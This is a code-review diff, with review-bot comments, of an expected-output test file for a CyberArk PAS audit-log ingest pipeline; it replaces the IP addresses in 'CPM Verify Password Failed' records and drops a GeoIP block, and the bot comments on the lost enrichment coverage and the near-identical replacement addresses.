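Review bot: In the `@@ -7,22 +7,11 @@` hunk the entire `destination.geo` object is dropped along with the IP swap, so after this change the test no longer exercises GeoIP enrichment of `destination.ip` at all. The reordering of `address` to after `user` suggests the expected file was regenerated from real pipeline output rather than hand-edited, which would mean `67.43.156.15` was not resolved by whatever GeoIP database was present during the run; if that address is one the test database is expected to resolve, the expected output should contain a geo block for it, and if it is not, picking an address the test database does resolve would keep the geo path covered. I would confirm the regeneration was done with the test GeoIP database available before merging, since a silently missing enrichment is exactly what this expected file exists to catch.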
@@ -57,27 +46,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T13:19:58Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814397\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814397\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", 
@@ -86,11 +75,11 @@
 "retries_count": "0",
 "reset_immediately": "VerifyTask",
 "last_task": "VerifyTask",
- "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+ "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ",
 "last_fail_date": "1615814397",
- "logon_domain": "34.66.114.180"
+ "logon_domain": "67.43.156.15"
 },
- "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+ "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart",
 "safe": "partner",
 "station": "10.0.1.20",
 "action": "CPM Verify Password Failed",
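Review bot: The replacement keeps two distinct addresses for a single record — `67.43.156.14` in `cyberarkpas.audit.file` here and in `file.path` of the `@@ -45,7 +34,7 @@` hunk, versus `67.43.156.15` in `logon_domain`, `cpm_error_details` and `related.ip` — mirroring the original fixture's `35.192.121.42` / `34.66.114.180` split. That is faithful to the source data, but with the new values one digit apart it reads like a typo, and a JSON expected file offers no place for a comment; a one-line remark in the PR description that the object name and the logon domain intentionally differ would stop the next reviewer from "fixing" it. The same pairing recurs in the `reason` and `raw` strings of the `@@ -57,27 +46,27 @@` hunk, so the note should cover both.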
@@ -103,9 +92,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493868300Z", - "original": "\u003c7\u003e1 2021-03-15T13:19:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814397\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:19:58\",\"IsoTimestamp\":\"2021-03-15T13:19:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=34.66.114.180;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814397\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
", + "ingested": "2021-12-09T13:37:01.193593200Z", + "original": "\u003c7\u003e1 2021-03-15T13:19:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814397\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:19:58\",\"IsoTimestamp\":\"2021-03-15T13:19:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814397\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -128,22 +117,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -166,7 +144,7 @@ }, "@timestamp": "2021-03-15T13:25:32.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -178,27 +156,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n", + "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n", "iso_timestamp": "2021-03-15T13:25:32Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814709\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
